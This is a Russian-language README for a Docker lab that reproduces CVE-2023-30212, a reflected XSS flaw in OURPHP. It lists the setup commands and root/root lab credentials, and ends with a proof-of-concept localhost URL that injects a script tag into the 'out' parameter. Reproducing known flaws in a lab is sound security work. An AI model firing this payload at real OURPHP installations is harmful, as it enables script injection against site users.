
# Docker-лаборатория уязвимого OURPHP для воспроизведения CVE-2023-30212 Лаборатория на базе Docker с уязвимым OURPHP для воспроизведения CVE-2023-30212 — отражённой XSS-уязвимости, включающая инструкции по настройке и URL эксплойта для проверки концепции.
Предварительные требования
Загрузить docker.io
sudo apt install -y docker.io
Загрузите все файлы из моего репозитория с помощью приведенной ниже команды.
git clone https://github.com/AAsh035/CVE-2023-30212.git
Теперь для создания образа docker выполните следующую команду:
sudo docker build -t vuln .
Далее преобразуйте образ docker в контейнер. Контейнер должен работать на порту 80. Команда:
sudo docker run -d -p 80:80 vuln
Чтобы проверить, запущен ли контейнер, используйте команду:
sudo docker ps
Введите 127.0.0.1 в браузере, и загрузится страница OURPHP.
Необходимо настроить ourphp, указав следующее:
Имя пользователя : root
Пароль : root
Имя базы данных: vuln
Теперь необходимо настроить имя пользователя и пароль для администратора. Укажите следующее:
Имя пользователя: root
Пароль: root
Скопируйте приведенную ниже ссылку и вставьте ее в браузер:
http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("bug")</script>
https://github.com/AAsh035/CVE-2023-30212/assets/136836668/218c8eca-f02b-41b2-931b-ba112da6c7e0